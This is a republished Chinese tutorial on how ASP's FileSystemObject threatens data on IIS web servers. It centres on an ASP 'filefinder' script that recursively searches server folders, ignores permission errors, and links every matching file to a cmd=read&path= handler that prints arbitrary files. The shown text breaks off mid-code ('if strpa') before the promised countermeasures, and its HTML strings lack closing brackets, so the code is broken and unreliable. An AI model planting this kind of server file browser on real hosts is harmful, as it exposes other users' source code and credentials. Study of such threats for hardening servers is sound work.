ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策

2016-01-29 18:17 8 1 收藏

ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策,ASP中FSO对象对IIS WEB服务器数据安全的威胁及对策

【 tulaoshi.com - ASP 】

  scripting.filesystemobject 对象是由 scrrun.dll  提供的许多供 vbscript/jscript 控制的 com 对象之一。scripting.filesystemobject 提供了非常便利的文本文件和文件目录的访问,但是同时也对 iis web 服务器数据安全造成了一定的威胁。

在继续深入讨论之前,请先到作者的主页http://263.csdn.net/edyang/ download 区 source 分栏下载 filefinder asp 源代码。

filefinder 的代码很简单,由3 个函数和 30 行左右的顺序代码构成。

最关键的是 findfiles 函数,通过对它的递归调用实现对某个目录的遍历,并且按照特定的文件扩展名来搜寻这些文件。



function findfiles(strstartfolder, strext)

        dim n

        dim othisfolder

        dim ofolders

        dim ofiles

        dim ofolder

        dim ofile



        ' 如果系统管理员对文件系统的权限进行细致的设置话,下面的代码就要出错

        ' 但是有些目录还是可以察看的,所以我们简单的把错误忽略过去

        on error resume next

        n = 0

        response.write "<bsearching " & strstartfolder & "</b<br"

        set othisfolder = g_fs.getfolder(strstartfolder)

        set ofiles = othisfolder.files

        for each ofile in ofiles

                ' 如果是指定的文件扩展名,输出连接导向本身,但用不同的命令 cmd

                ' 在这里是 cmd=read,即读出指定物理路径的文本文件

                if issuffix(ofile.path, strext) then

                    response.write "<a target=_blank href='ff.asp?cmd=read&path=" & server.htmlencode(ofile.path) & "'<font color='dodgerblue'" & ofile.path & "</font</a<br"

                    if err = 0 then

                            n = n + 1

                    end if

                end if

        next

        set ofolders = othisfolder.subfolders

        for each ofolder in ofolders

                n = n + findfiles(ofolder.path, strext)

        next

        findfiles = n

end function

下面的代码是对 url 后面的参数进行分析:


' 读出各个参数的值

strcmd = ucase(request.querystring("cmd"))

strpath = request.querystring("path")

strext = request.querystring("ext")

brawdata = ucase(request.querystring("raw"))

' 默认搜索 .asp 文件

if strpa

来源:http://www.tulaoshi.com/n/20160129/1505201.html

延伸阅读
win7下利用iis搭建web服务器的方法   1、首先打开开始菜单中的控制面板选择,在控制面板中选择并打开程序,找到并双击打开或关闭Windows功能,在弹出的窗口中选择Internet信息服务下面所有选项,点击确定,然后就会开始更新服务,等待一会; 2、等待更新完成之后,打开浏览器,在浏览器地址栏上输入http://localhost/,然后回...
标签: 服务器
Web服务器配置方法 Web服务器概述 Web服务器又称为WWW服务器,它是放置一般网站的服务器。一台Web服务器上可以建立多个网站,各网站的拥有者只需要把做好的网页和相关文件放置在Web服务器的网站中,其它用户就可以用浏览器访问网站中的网页了。 我们配置Web服务器,就是在服务器上建立网站,并设置好相关的参数,至于网站中的...
标签: 服务器
IIS网站独立帐号设置教程确保服务器安全 自己的服务器某个站被人入侵后,其它的网站也相继遭殃,百分之九十是IIS网站帐号权限过大,服务器上的所有网站共用一个IIS帐号所致,接来下新手如何设置IIS网站帐号,感兴趣的朋友可以参考下哈 被人黑过站的同学,都应该有这样的经历。自己的服务器某个站被人入侵后,其它的网站也相继遭殃,这...
标签: ASP
  大家知道直接使用ASP是不能够重启服务器的,这时我们需要制作一个组件来实现功能,ASP通过这个组件调用系统API,然 后按照不同的重启和关机方式进行操作!            下面先说COM的制作,在VB中新建一工程,当然是AceiveX dll的!      1)先修改工程属性...
标签: ASP
  重庆出版社电脑中心 陈刚 1.什么是ASP服务器组件 ASP(Active Server Page)是当今开发交互式Web页面、Web数据库应用最强大的技术。在其中可以混用HTML、DHTML、 ActiveX、VBScript或JavaScript。当这些技术都无法奏效时(例如进行高密度的数学运算、封装特定的数据库处理逻辑 等),可以使用服务器组件(Server SideComponent)进一...

经验教程

77

收藏

81
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部